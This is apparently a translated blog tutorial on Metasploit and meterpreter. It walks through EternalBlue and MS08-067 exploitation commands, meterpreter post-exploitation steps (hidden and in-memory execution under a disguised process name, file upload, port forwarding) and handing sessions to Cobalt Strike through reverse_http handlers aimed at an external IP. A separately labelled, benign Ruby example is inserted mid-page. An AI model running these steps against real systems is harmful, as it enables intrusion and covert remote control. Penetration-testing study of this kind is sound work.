Detailed msf - meterpreter - penetration testing tutorial

Foreword

This article is only for learning and reference and must not be used for anything illegal!

As everyone knows, msf is a recognised artifact. When I was younger I did not appreciate msf and always wanted to write my own programs.

Now I find that msf is very powerful and that you can build on top of it.

msf is a framework. What does that mean? It can be used to carry out the whole sequence of a penetration attack: early exploration (reconnaissance), the mid-phase attack (engaging the target), and late-stage control (pushing through to the objective).
We can develop our own programs on msfconsole (our own hero, to continue the game analogy), and those programs can make use of the modules in msf (the hero's equipment).

Introduction to msfconsole

Metasploit is an open-source vulnerability detection tool that ships with exploits for hundreds of known software vulnerabilities and is updated frequently. It is a powerful penetration testing framework that the security community has dubbed the tool that "can hack the entire universe".

Five basic terms:

Exploit: an attack carried out by an attacker or penetration tester by taking advantage of a security vulnerability in a system, application or service.

Payload: the code we expect the target system to execute after it has been penetrated.

Shellcode: a set of machine instructions run as the attack payload during a penetration attack, usually written in assembly language.

Module: a software code component used within the Metasploit framework, which can launch a penetration attack or perform some auxiliary action.

Listener: the Metasploit component that waits for incoming network connections.

How to use msfconsole - common commands

Basic usage: launching an exploit directly

# First use:
service postgresql start     # start the database service
msfdb init                   # initialise the database

# Subsequent use:
msfconsole                   # start metasploit

# view the help options
help

# search - look up a vulnerability:
search ms08_067

# use - select the exploit module:
use exploit/windows/smb/ms08_067_netapi

# show - list the target operating systems this module can attack (targets):
show targets

# set - set the target parameter (xx is the index matching the target machine's OS version):
set target xx

# set - set the rhost parameter (the target machine's IP address):
set rhost 192.168.xxx.xxx

# show - view the parameters:
show options

# launch the attack:
exploit

For the specific parameters of each command, see the help output:

help

msfconsole attack in practice

Because msfconsole is primarily an internal-network penetration tool, results over the external network are less satisfying, and port forwarding and similar concerns have to be handled.

For example:
On the internal network, a reverse shell can connect straight back to the local machine's IP.
On the external network, if port forwarding is used, the callback IP is the external IP and the callback port is the external port.

After the payload is successfully uploaded and executed, a meterpreter (pseudo shell) on the target is obtained.

Take the EternalBlue (ms17_010) exploit process as an example.

Penetration process:

First, scan with the smb scanner module of msfconsole to check whether the host is vulnerable:

use auxiliary/scanner/smb/smb_ms17_010

(Scan result: the host is reported as vulnerable.)

Use the exploit module:

use exploit/windows/smb/ms17_010_eternalblue
show options

Set the target and the listener:

set rhost 192.168.148.137
# set the payload options, etc.
set lhost 192.168.148.134
set lport 4444
run

Result: a meterpreter session is opened, and the target's information can be viewed from it.

According to the online tutorial, the payloads shipped with this module are all 64-bit. If the target machine is 32-bit the architecture will not match, and you need to download and load a new module.

For how to load new modules and develop new ones, see the section "Loading external modules: follow-up on the ms17_010 practice".

Remark:

By default, a session with no activity for 5 minutes (300 seconds) is killed. To prevent this, change the timeout:

set SessionExpirationTimeout 0

End of the penetration:

When targets are exploited in batches and there are many sessions (one per successful attack), the following operations are available:

# list the sessions
sessions -l

# select a session
sessions -i <id>

# run a command on every session
sessions -c "<cmd>"

# run a meterpreter command on every session
sessions -C "<meterpreter_cmd>"

# return from the selected session to the console
background

# exit the session, which also closes its meterpreter
exit

Loading external modules: follow-up on the ms17_010 practice

If the payload reports an architecture error (see Figure 4), you can use the module from GitHub:

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

Download it to the root directory and unzip it. If it is the msf that ships with Kali, copy the module files to

/usr/share/metasploit-framework/modules/exploits/windows/smb

If it is msf downloaded separately on Linux, copy them to

/opt/metasploit-framework/embedded/framework/modules/exploits/windows/smb

Open msf and reload the modules:

reload_all
reload
use exploit/windows/smb/eternalblue_doublepulsar
show options

The exploit appears to have been built for Windows and has some problems running on Linux, so install wine32 and confirm it works:

wine -h

Run the exploit again. If an error is still reported, try disguising the injection by choosing a process to inject into:

set processinject explorer.exe

With that, the shell is successfully bounced back.

meterpreter command execution

  1. upload - upload a file
     Upload an exe to the target machine's c:\ls\ directory:

     upload 1.exe c:\\ls\\

  2. download - download a file from any path on the target that the session's privileges can read
     Command: download <file path>

     download c:\\ls\\1.exe

  3. sysinfo and execute commands
     sysinfo displays the remote host's system information: computer name, OS, architecture, language and so on.
     execute runs a program on the target host; the first command below runs cmd.exe hidden and interacts with it directly in the meterpreter session:

     execute -H -i -f cmd.exe
     execute -H -m -d notepad.exe -f 1.exe -a "-o 2.txt"
     # -d  the process name shown on the target host while running (used as a disguise)
     # -m  execute directly from memory
     # -a "-o 2.txt"  the arguments passed to 1.exe

  4. portfwd command:

     # port forwarding: listen on local port yyyy and forward it to port zzzz on the target
     portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx
     # check whether the specified local port is open
     netstat -an | grep "yyyy"

  5. For more commands, enter help to view them.

     Several targets can be set at once:

     show options
     set RHOSTS 127.0.0.1 127.0.0.2

     This bounces two shells; in this run, sessions -i 9 connects to 127.0.0.2 through meterpreter.

     Once inside the target, upload sometimes fails:

     [-] Error running command upload: Rex::TimeoutError Operation timed out.

     Reasons for the error: insufficient disk space, high network latency, etc.

msfconsole development practice

Beyond basic usage you can also extend msf: add modules, modify code, and so on.

Browse the msfconsole directory

Directory       Content
data            user interface code
documentation   documentation
external        source code such as meterpreter
lib             Ruby library (so, to learn msf well, read a Ruby tutorial)
modules         the various modules
plugins         various plug-ins, such as database connection plug-ins
scripts         scripts used by the meterpreter module
tools           miscellaneous tools and scripts

The most important directory is modules, which holds the individual modules; modules can call one another.

Writing a module (an exp module as the example):

Ideas for writing an exp module

The real work of exploit development happens behind the scenes; the language you choose is not actually the point. What you need to think about is the exploit itself, nothing else.

exp module fields

Field            Content
Name             vendor, software, faulting component, vulnerability type
Author           author
Description      notes for the user
Platform         supported platforms, e.g. win, linux, osx, unix, bsd
Targets          an array of systems, applications or settings. The second element of each entry is where you store that target's special metadata (specific offsets, gadgets, return addresses, etc.). When the user selects a target, that metadata is loaded and tracked by its "target index" and can be retrieved through the target method.
Payload          specifies how the payload should be encoded and generated. You can set: Space, SaveRegisters, Prepend, PrependEncoder, BadChars, Append, AppendEncoder, MaxNops, MinNops, Encoder, Nop, EncoderType, EncoderOptions, ExtendedOptions, EncoderDontFallThrough
DisclosureDate   public disclosure date
Arch             architecture
check            optional; the function called by the check command
exploit          main function, the real exploit code

exp module example

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  def initialize(info = {})
    # update_info merges this module's fields over the info hash passed in
    super(update_info(info,
      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
      'Description'    => %q{
        Say something that the user might need to know
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Name' ],
      'References'     =>
        [
          [ 'URL', '' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'System or software version',
            {
              'Ret' => 0x41414141 # This will be available in `target.ret`
            }
          ]
        ],
      'Payload'        => {
          'BadChars' => "\x00"  # bytes the encoder must keep out of the generated payload
        },
      'Arch'           => ARCH_ARMLE,
      'Privileged'     => false,
      'DisclosureDate' => "",
      'DefaultTarget'  => 0))
  end

  def check
    # Called by the check command; return a Msf::Exploit::CheckCode
  end

  def exploit
    # Main function: the real exploit logic goes here
  end

end
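As an added example (not code from the page and not Metasploit's own), the stand-alone Ruby below models the metadata conventions from the field table and the template above: an update_info-style merge, selecting a target by index and reading its metadata the way target.ret does, and checking a candidate payload against Payload['BadChars']. REQUIRED_FIELDS, ModuleInfo and the sample data are my own stand-ins; the script does not load the framework.

```ruby
# Added example: a minimal model of exploit-module metadata handling.
# ModuleInfo, REQUIRED_FIELDS and SAMPLE_INFO are stand-ins, not msf code.

REQUIRED_FIELDS = %w[Name Description Author Platform Targets Payload DisclosureDate].freeze

# Layer the module's own fields over the caller-supplied info hash, the way the
# template's super(update_info(info, ...)) call does.
def update_info(info, updates)
  info.merge(updates)
end

class ModuleInfo
  attr_reader :info

  def initialize(info)
    missing = REQUIRED_FIELDS.reject { |k| info.key?(k) }
    raise ArgumentError, "missing fields: #{missing.join(', ')}" unless missing.empty?
    targets = info['Targets']
    raise ArgumentError, 'Targets must be a non-empty array' unless targets.is_a?(Array) && !targets.empty?
    @info = info
    @target_index = info.fetch('DefaultTarget', 0)
  end

  # Select a target by its "target index" (what `set target N` chooses).
  def select_target(index)
    raise IndexError, "no target #{index}" unless (0...@info['Targets'].size).cover?(index)
    @target_index = index
  end

  # The selected target's name (first element of the entry).
  def target_name
    @info['Targets'][@target_index][0]
  end

  # The selected target's metadata hash (second element), e.g. meta['Ret'] ~ target.ret.
  def target_meta
    @info['Targets'][@target_index][1] || {}
  end

  # Offsets in a candidate payload holding a byte listed in Payload['BadChars'].
  def bad_char_offsets(payload)
    bad = @info.fetch('Payload', {}).fetch('BadChars', '').bytes
    payload.bytes.each_with_index.select { |b, _| bad.include?(b) }.map { |_, i| i }
  end

  def payload_ok?(payload)
    bad_char_offsets(payload).empty?
  end
end

# Constructed sample metadata mirroring the template's fields (placeholder values).
SAMPLE_INFO = update_info({},
  'Name'           => '[Vendor] [Software] [Root Cause] [Vulnerability type]',
  'Description'    => 'Constructed sample module metadata',
  'Author'         => ['Name'],
  'Platform'       => 'win',
  'Targets'        => [
    ['Version A', { 'Ret' => 0x41414141 }],
    ['Version B', { 'Ret' => 0x42424242 }]
  ],
  'Payload'        => { 'BadChars' => "\x00\x0a" },
  'DisclosureDate' => '',   # placeholder, as in the template
  'DefaultTarget'  => 0
)

# Pick the second target and test a constructed 4-byte payload against BadChars.
def demo
  m = ModuleInfo.new(SAMPLE_INFO)
  m.select_target(1)
  { name: m.target_name, ret: m.target_meta['Ret'],
    bad: m.bad_char_offsets("\x90\x00\x90\x0a".b) }
end

p demo if __FILE__ == $0
```

The bad-character check is the part worth keeping in mind when filling in the Payload field: whatever the encoder produces has to be free of every byte listed there, and a quick offset scan like this is how you verify a hand-built payload before pointing the module at a target.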

Loading the module

Copy the rb module to

/opt/metasploit-framework/embedded/framework/modules/exploits/xxx(the folder name you chose)/xxx.rb(your file)

Open msf and reload:

reload_all
reload

Then:

# the module name is its path under modules/, written with 'exploit' in the singular and without the .rb extension
use exploit/xxx(the folder name you chose)/xxx(your file)

msfconsole extension (used together with CS)

  • Both Cobalt Strike and Metasploit are penetration tools, each with its own strengths. The former is better suited as a stable control platform, while the latter excels at the various kinds of detection, collection and vulnerability exploitation inside the intranet. The two need flexible linkage and complement each other to improve penetration efficiency.

1. Passing a CS session to msf

(1) A PC comes online in CS.

(2) Set up the msf handler:

# msfconsole
use exploit/multi/handler
# note: reverse_http, not TCP (in cs 4.2 I did not find an outbound TCP listener)
set payload windows/meterpreter/reverse_http
set lhost 103.234.72.5
set lport 10086
show options
exploit

(3) Set up the CS listener, then right-click, pick spawn and select this listener.

Go back to msf and you can see that the machine is online.

# view all sessions
sessions -l

There are far more ways to use Cobalt Strike and Metasploit in linkage; each method has its own application scenarios in practice and needs to be explored and summarised.

2. Passing an msf session to CS

(1) First, send the meterpreter obtained in msf to the background: run the command background.

(2) Then use exploit/windows/local/payload_inject to inject a new payload into the session. The commands are as follows:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
# the cs host address
set LHOST 103.234.72.5
# any listening port, but it must match the cs listener
set LPORT 84
# the meterpreter session to hand over
set session 2
# do not spawn a new handler
set DisablePayloadHandler true
# launch the injection
run

You can see that the machine is now online on the cs side.

  • CS+MSF summary

    Detailed information collection during testing opens up different penetration routes, and only the combined use and reuse of that information can magnify the results more effectively.

Summary

MSF can be regarded as the C language of this field: by calling its libraries it can complete all sorts of batch, high-impact, stable and efficient operations, and it is very easy to use!

Origin blog.csdn.net/qq_42882717/article/details/123643133